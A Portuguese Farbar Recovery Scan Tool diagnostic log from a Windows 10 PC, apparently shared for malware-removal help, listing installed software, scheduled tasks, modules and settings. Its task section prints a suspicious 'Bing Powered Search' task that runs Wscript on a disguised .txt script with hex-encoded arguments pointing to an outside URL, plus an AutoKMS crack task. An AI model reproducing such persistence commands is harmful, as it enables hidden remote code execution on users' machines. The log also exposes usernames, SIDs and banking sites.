Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão: 31-08-2016
Executado por rafael (04-09-2016 19:35:17)
Executando a partir de C:\Users\gabri\Desktop
Windows 10 Pro Versão 1607 (X64) (2016-08-07 16:54:35)
Modo da Inicialização: Normal
==========================================================

==================== Contas: =============================

Administrador (S-1-5-21-4085003843-1987285651-1473373783-500 - Administrator - Disabled)
Convidado (S-1-5-21-4085003843-1987285651-1473373783-501 - Limited - Disabled)
DefaultAccount (S-1-5-21-4085003843-1987285651-1473373783-503 - Limited - Disabled)
rafael (S-1-5-21-4085003843-1987285651-1473373783-1001 - Administrator - Enabled) => C:\Users\gabri

==================== Central de Segurança ========================

(Se uma entrada for incluída na fixlist, será removida.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programas Instalados ======================

(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)

µTorrent (HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\uTorrent) (Version: 3.4.8.42449 - BitTorrent Inc.)
4500_G510af_Help (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden 4500G510af (x32 Version: 140.0.001.000 - Hewlett-Packard) Hidden 4500G510af_Software_Min (x32 Version: 140.0.001.000 - Hewlett-Packard) Hidden 64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden Akamai NetSession Interface (HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\Akamai) (Version: - Akamai Technologies, Inc) Ansel (Version: 372.70 - NVIDIA Corporation) Hidden ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 4.0.5 - ASUS) Autodesk Advanced Material Library Image Library 2016 (HKLM-x32\...\{94AD53E7-493B-4291-8714-7A3B761D2783}) (Version: 6.3.0.15 - Autodesk) Autodesk Material Library 2016 (HKLM-x32\...\{29A7D6EC-63C2-42FD-8143-5812ABD2923F}) (Version: 6.3.0.15 - Autodesk) Autodesk Material Library Base Resolution Image Library 2016 (HKLM-x32\...\{6B4CFC6E-ECB0-47FE-95D3-65C680ED0687}) (Version: 6.3.0.15 - Autodesk) Bing Powered Search (HKLM-x32\...\BingPoweredSearch) (Version: - ) BS.Player FREE (HKLM-x32\...\BSPlayerf) (Version: 2.70.1080 - AB Team, d.o.o.) BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden Counter-Strike Global Offensive WaRzOnE (HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\CSGO) (Version: - CS WaRzOnE) DocProc (x32 Version: 140.0.185.000 - Hewlett-Packard) Hidden ELAN Touchpad 11.15.0.14_X64 (HKLM\...\Elantech) (Version: 11.15.0.14 - ELAN Microelectronic Corp.) Emergency Download Driver (HKLM-x32\...\{3F0F5AB4-C9CE-4226-8393-E9CFF8369D9D}) (Version: 1.1.16.1526 - Microsoft) Fallout New Vegas Ultimate Edition version 1.4.0.525 (HKLM-x32\...\Fallout New Vegas Ultimate Edition_is1) (Version: 1.4.0.525 - Mr DJ) Foxit Cloud (HKLM-x32\...\{41914D8B-9D6E-4764-A1F9-BC43FB6782C1}_is1) (Version: 3.7.135.908 - Foxit Software Inc.) Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 7.2.0.722 - Foxit Software Inc.) 
Geeks3D FurMark 1.17.0.0 (HKLM-x32\...\{2397CAD4-2263-4CD0-96BE-E43A980B9C9A}_is1) (Version: - Geeks3D) GPBaseService2 (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden GPU Caps Viewer 1.23.0.2 (HKLM-x32\...\{F6E04BE8-2FA4-44C4-9BD3-142CE3EB15B4}_is1) (Version: - Geeks3D.com) HP Officejet 4500 G510a-f 14.0 Rel. 6 (HKLM\...\{A49C5804-8F24-433C-99B2-9F9F541090C7}) (Version: 14.0 - HP) HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP) HPPhotoGadget (x32 Version: 140.0.524.000 - Hewlett-Packard) Hidden HPProductAssistant (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden HPSSupply (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation) jetAudio Basic (HKLM-x32\...\{DF8195AF-8E6F-4487-A0EE-196F7E3F4B8A}) (Version: 8.1.0 - COWON) K-Lite Codec Pack 11.3.6 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 11.3.6 - ) Maxthon Cloud Browser (HKLM-x32\...\Maxthon3) (Version: 4.9.3.1000 - Maxthon International Limited) Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation) Microsoft Office 2003 Web Components (HKLM-x32\...\{90120000-00A4-0409-0000-0000000FF1CE}) (Version: 12.0.6213.1000 - Microsoft Corporation) Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation) Microsoft OneNote 2013 (HKLM\...\Office15.ONENOTER) (Version: 15.0.4569.1506 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50428.0 - Microsoft Corporation) Microsoft SQL Server 2008 Native Client (HKLM\...\{C79A7EAB-9D6F-4072-8A6D-F8F54957CD93}) (Version: 10.0.1600.22 - Microsoft Corporation) Microsoft SQL Server 2008 Setup Support Files (HKLM\...\{B40EE88B-400A-4266-A17B-E3DE64E94431}) (Version: 10.1.2731.0 - Microsoft Corporation) 
Microsoft SQL Server 2012 (64-bit) (HKLM\...\Microsoft SQL Server SQLServer2012) (Version: - Microsoft Corporation) Microsoft SQL Server 2012 Native Client (HKLM\...\{49D665A2-4C2A-476E-9AB8-FCC425F526FC}) (Version: 11.0.2100.60 - Microsoft Corporation) Microsoft SQL Server 2012 Setup (English) (HKLM\...\{5DDC2234-4B37-45BC-AD33-41F1469B4D83}) (Version: 11.0.2100.60 - Microsoft Corporation) Microsoft SQL Server 2012 Transact-SQL ScriptDom (HKLM\...\{0E8670B8-3965-4930-ADA6-570348B67153}) (Version: 11.0.2100.60 - Microsoft Corporation) Microsoft Visio Professional 2013 (HKLM\...\Office15.VISPROR) (Version: 15.0.4569.1506 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) 
(Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual Studio 2005 Remote Debugger Light (x64) - ENU (HKLM\...\Microsoft Visual Studio 2005 Remote Debugger Light (x64) - ENU) (Version: - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) Microsoft VSS Writer for SQL Server 2012 (HKLM\...\{3E0DD83F-BE4C-4478-86A0-AD0D79D1353E}) (Version: 11.0.2100.60 - Microsoft Corporation) Mozilla Firefox 47.0.1 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 47.0.1 (x86 pt-BR)) (Version: 47.0.1 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 47.0.1.6018 - Mozilla) MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft 
Corporation) No Man's Sky (HKLM-x32\...\1446213994_is1) (Version: 2.0.0.2 - GOG.com) No Man's Sky Pre-order DLC (HKLM-x32\...\2022706229_is1) (Version: 2.0.0.2 - GOG.com) Nokia PC Internet Access (HKLM-x32\...\Nokia PC Internet Access) (Version: 2.0.2.2 - Nokia) Nokia PC Internet Access (x32 Version: 2.0.2.2 - Nokia) Hidden NVIDIA GeForce Experience 2.11.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.4.0 - NVIDIA Corporation) NVIDIA Graphics Driver 372.70 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 372.70 - NVIDIA Corporation) NVIDIA Software do sistema PhysX 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation) OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP) Outils de vérification linguistique 2013 de Microsoft Office - Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden Pacote de Driver do Windows - ASUS (ATP) Mouse (06/17/2015 1.0.0.262) (HKLM\...\14588A15B66655338DBCC021FFA81E31DC281859) (Version: 06/17/2015 1.0.0.262 - ASUS) Pacote de Idiomas do Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - Português (Brasil) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PTB) (Version: 10.0.50903 - Microsoft Corporation) PowerISO (HKLM-x32\...\PowerISO) (Version: 6.6 - Power Software Ltd) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.10.714.2016 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.) Revisores de Texto do Microsoft Office 2013 – Português do Brasil (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden Scan (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden Secure Download Manager (HKLM-x32\...\{F0858165-B8DB-4347-89B8-6D9F882B9BF3}) (Version: 3.1.60 - Kivuto Solutions Inc.) 
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft) Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{91150000-0051-0000-1000-0000000FF1CE}_Office15.VISPROR_{F0C12872-B60D-4E37-A2F9-20C46A5E1F1A}) (Version: - Microsoft) Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{91150000-00A1-0000-1000-0000000FF1CE}_Office15.ONENOTER_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft) Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (Version: - Microsoft) Hidden SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden SHIELD Wireless Controller Driver (Version: 2.11.4.0 - NVIDIA Corporation) Hidden Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 14.0 - HP) Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.3.0.9150 - Microsoft Corporation) Skype™ 7.7 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.7.103 - Skype Technologies S.A.) 
SolutionCenter (x32 Version: 140.0.299.000 - Hewlett-Packard) Hidden SQL Server 2012 Common Files (Version: 11.0.2100.60 - Microsoft Corporation) Hidden SQL Server 2012 Database Engine Services (Version: 11.0.2100.60 - Microsoft Corporation) Hidden SQL Server 2012 Database Engine Shared (Version: 11.0.2100.60 - Microsoft Corporation) Hidden SQL Server Browser for SQL Server 2012 (HKLM-x32\...\{4B9E6EB0-0EED-4E74-9479-F982C3254F71}) (Version: 11.0.2100.60 - Microsoft Corporation) Sql Server Customer Experience Improvement Program (Version: 11.0.2100.60 - Microsoft Corporation) Hidden Switch Sound File Converter (HKLM-x32\...\Switch) (Version: 5.06 - NCH Software) TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version: - TechPowerUp) Toolbox (x32 Version: 140.0.596.000 - Hewlett-Packard) Hidden Update for Skype for Business 2015 (KB3039776) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{0FA8AE0C-69AE-4F60-A1AB-F79C6BA5A999}) (Version: - Microsoft) USB Serial Port Driver (HKLM-x32\...\{FE11883D-EA67-473C-BDD1-8D6B6DFCBEAC}) (Version: 1.1.8.1526 - Microsoft) Vulkan Run Time Libraries 1.0.11.1 (HKLM\...\VulkanRT1.0.11.1-2) (Version: 1.0.11.1 - LunarG, Inc.) Vulkan Run Time Libraries 1.0.11.1 (Version: 1.0.11.1 - LunarG, Inc.) 
Hidden Warsaw 1.12.4.14 64 bits (HKLM\...\{20E60725-16C8-4FB9-8BC2-AF92C5F8D06D}_is1) (Version: 1.12.4.14 - GAS Tecnologia) WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden WinRAR 5.21 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH) WinUsb CoInstallers (HKLM-x32\...\{9755918A-CDF8-4F1E-8453-6359CF1A330A}) (Version: 1.1.12.1526 - Microsoft) WinUSB Compatible ID Drivers (HKLM-x32\...\{A4A0B236-6046-4CAB-8177-1EAF61112C75}) (Version: 1.1.11.1526 - Microsoft) WinUSB Drivers ext (HKLM-x32\...\{B7F55FF1-607A-4E12-BF64-8770BC618D12}) (Version: 1.1.23.1526 - Microsoft) ==================== Exame Personalizado CLSID (Whitelisted): ========================== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) CustomCLSID: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001_Classes\CLSID\{0B628DE4-07AD-4284-81CA-5B439F67C5E6}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2016\acad.exe /Automation => Nenhum Arquivo CustomCLSID: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001_Classes\CLSID\{149DD748-EA85-45A6-93C5-AC50D0260C98}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2016\acad.exe => Nenhum Arquivo CustomCLSID: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001_Classes\CLSID\{5370C727-1451-4700-A960-77630950AF6D}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2016\acad.exe /Automation => Nenhum Arquivo CustomCLSID: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\gabri\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\FileCoAuth.exe (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation) CustomCLSID: 
HKU\S-1-5-21-4085003843-1987285651-1473373783-1001_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> C:\Program Files\Autodesk\AutoCAD 2016\en-US\acadficn.dll => Nenhum Arquivo ==================== Tarefas Agendadas (Whitelisted) ============= (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) Task: {20B6C91A-A200-45D7-8C3B-ACB054A7DF39} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\gabri\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe [2016-08-22] (Microsoft Corporation) Task: {232F203B-1299-4568-87DF-E62A339CA260} - System32\Tasks\RtHDVBg_ListenToDevice => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-08-07] (Realtek Semiconductor) Task: {30F0A62D-F2D2-49C4-B1A1-1E20A5273FB3} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-08-10] (Microsoft Corporation) Task: {5DE65750-A1E5-4E34-B419-73166D08B4F2} - System32\Tasks\Driver Booster Beta SkipUAC (gabri) => C:\Program Files (x86)\IObit\Driver Booster Beta\DriverBooster.exe Task: {7645CF61-E0A3-4002-9632-50F61BCDD11B} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation) Task: {8B0EADF4-DBA9-4E06-BFA8-AD6E005BB3E5} - System32\Tasks\{7A293573-E403-E6B5-A79D-3A6CD5BA8850} => C:\Users\gabri\AppData\Local\{5A9D6~1\Updater.exe [2013-04-09] () <==== ATENÇÃO Task: {A0D444E0-28E6-4738-9634-200BB96A883F} - \GenericSettingsHandler\Windows-Credentials\RetrySyncTask_for_S-1-5-21-4085003843-1987285651-1473373783-1001 -> Nenhum Arquivo <==== ATENÇÃO Task: {AE0E0B23-8B34-4F8E-9DAD-8BAEC6A66BD0} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation) Task: {B123DC9E-77CF-4736-91B5-132F04950492} - 
System32\Tasks\Maxthon Update => C:\Program Files (x86)\Maxthon\Bin\MxEidolon.exe [2016-06-12] (Maxthon MxEidolo) Task: {B40E9650-FF88-483E-B750-BFA952DB5E34} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation) Task: {BF2FF39C-FD4B-4E59-A359-DC421F56A2F8} - System32\Tasks\Bing Powered Search sasir => Wscript.exe "C:\ProgramData\{12D0D7B3-9892-5D75-1E54-C337841648F9}\naca.txt" "687474703a2f2f79786870612e636f6d" "433a5c50726f6772616d446174615c7b31324430443742332d393839322d354437352d314535342d4333333738343136343846397d5c746574696c61" "433a5c50726f6772616d446174615c7b31324430443742332d393839322d354437352d314535 (a entrada de dados tem 78 mais caracteres). Task: {C4523C41-B540-4859-8A6D-B3111050D928} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe [2015-08-21] () Task: {CC8CCCA9-8491-4A83-B631-1273271D881A} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe Task: {F463CCFB-AB7D-4710-86AE-6305F887BE9B} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2015-08-07] (Realtek Semiconductor) (Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.) Task: C:\WINDOWS\Tasks\Bing Powered Search sasir.job => Wscript.exe C:\ProgramData\{12D0D7B3-9892-5D75-1E54-C337841648F9}\naca.txt <==== ATENÇÃO Task: C:\WINDOWS\Tasks\{7A293573-E403-E6B5-A79D-3A6CD5BA8850}.job => ==================== Atalhos ============================= (As entradas podem ser listadas para serem restauradas ou removidas.) 
Shortcut: C:\Users\gabri\Favorites\NCH Software Download Site.lnk -> hxxp://www.nch.com.au/index.html ==================== Módulos Carregados (Whitelisted) ============== 2016-07-16 08:42 - 2016-07-16 08:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll 2016-07-16 08:42 - 2016-07-16 08:42 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll 2016-08-07 13:16 - 2016-08-25 18:12 - 00133056 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2016-06-30 18:28 - 2016-06-14 17:03 - 00367552 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll 2015-12-25 15:11 - 2016-06-14 17:03 - 00288192 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll 2016-06-30 18:28 - 2016-06-14 17:03 - 03611584 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll 2016-06-30 18:28 - 2016-06-14 17:03 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\libprotobuf.dll 2016-06-30 18:28 - 2016-06-14 17:03 - 01988544 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvPortForwardPlugin.dll 2016-06-30 18:28 - 2016-06-14 17:03 - 02665920 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvMdnsPlugin.dll 2016-06-30 18:28 - 2016-06-14 17:03 - 01840576 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\RtspPlugin.dll 2016-06-30 18:28 - 2016-06-14 17:03 - 00207296 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\RtspServer.dll 2016-06-30 18:28 - 2016-06-14 17:03 - 00920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll 2016-06-30 18:28 - 2016-06-14 17:03 - 00034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll 2016-07-16 08:42 - 2016-07-16 08:42 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll 2016-08-22 23:39 - 2016-08-22 23:39 - 01864384 _____ () C:\Users\gabri\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\amd64\ClientTelemetry.dll 2016-06-14 13:37 - 
2016-06-14 13:37 - 08909504 _____ () C:\Program Files\Microsoft Office\Office15\1033\GrooveIntlResource.dll 2015-08-19 16:32 - 2015-08-19 16:32 - 00110800 _____ () C:\Windows\Secure64.dll 2016-07-16 08:42 - 2016-07-16 08:42 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll 2016-07-16 08:43 - 2016-08-17 16:16 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll 2016-07-16 08:43 - 2016-08-24 00:54 - 09761280 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 2016-08-25 23:56 - 2016-08-20 01:54 - 01401344 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2016-07-16 08:43 - 2016-08-24 00:54 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll 2016-07-16 08:43 - 2016-08-24 00:54 - 01033728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll 2016-08-25 23:55 - 2016-08-20 01:54 - 02438144 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll 2016-08-25 23:56 - 2016-08-20 01:56 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll 2016-08-29 06:12 - 2016-08-29 06:12 - 00071168 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.7.113.0_x64__kzf8qxf38zg5c\SkypeHost.exe 2016-08-29 06:12 - 2016-08-29 06:12 - 00178176 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.7.113.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll 2016-08-29 06:12 - 2016-08-29 06:12 - 35288064 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.7.113.0_x64__kzf8qxf38zg5c\SkyWrap.dll 2015-08-19 16:32 - 2015-08-19 16:32 - 00116944 _____ () C:\Windows\Secure.dll 2015-08-08 01:06 - 2016-06-14 17:03 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll 2016-08-22 23:39 - 2016-08-22 23:39 - 01383616 _____ () 
C:\Users\gabri\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\ClientTelemetry.dll 2016-08-22 23:39 - 2016-08-22 23:39 - 00118976 _____ () C:\Users\gabri\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\FileSyncViews.dll 2016-06-14 13:38 - 2016-06-14 13:38 - 08909504 _____ () C:\Program Files (x86)\Microsoft Office\Office15\1033\GrooveIntlResource.dll ==================== Alternate Data Streams (Whitelisted) ========= (Se uma entrada for incluída na fixlist, somente o ADS será removido.) AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt [10] AlternateDataStreams: C:\WINDOWS\system32\Drivers\gbpddfac64.sys:X5ZN8aGvT4 [2262] AlternateDataStreams: C:\WINDOWS\system32\Drivers\gbpddreg64.sys:X5ZN8aGvT4 [686] AlternateDataStreams: C:\WINDOWS\system32\Drivers\wsddfac.sys:X5ZN8aGXs4 [1198] AlternateDataStreams: C:\ProgramData\GbPlugin:IncompleteStartGbprcm.cnt [10] AlternateDataStreams: C:\Users\Todos os Usuários\GbPlugin:IncompleteStartGbprcm.cnt [10] ==================== Modo de Segurança (Whitelisted) =================== (Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.) ==================== Associação (Whitelisted) =============== (Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.) HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\Software\Classes\.scr: AutoCADScriptFile => ==================== Internet Explorer confiável/restrito =============== (Se uma entrada for incluída na fixlist, será removida do Registro.) 
IE trusted site: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\bancobrasil.com.br -> www.bancobrasil.com.br
IE trusted site: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\bb.com.br -> aapj.bb.com.br
IE trusted site: HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\...\gastecnologia.com.br -> cloud.gastecnologia.com.br

==================== Hosts Conteúdo: ===============================

(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)

2015-07-10 08:04 - 2015-07-10 08:02 - 00000824 ____N C:\WINDOWS\system32\Drivers\etc\hosts

==================== Outras Áreas ============================

(Atualmente não há nenhuma correção automática para esta seção.)

HKU\S-1-5-21-4085003843-1987285651-1473373783-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\gabri\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\16676012163_c43eca7d36_o.jpg
DNS Servers: 201.17.128.77 - 201.17.128.72
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.

